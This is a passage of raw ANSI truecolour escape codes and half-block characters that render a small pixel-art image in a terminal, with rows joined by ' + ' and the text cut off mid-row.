\e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[0m + \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[0m\e[38;2;99;149;87m▄\e[0m + \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m + \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m + \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m + \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m + \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m + \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m + \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m + \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m + \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m + \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m + \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m + \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m + \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m 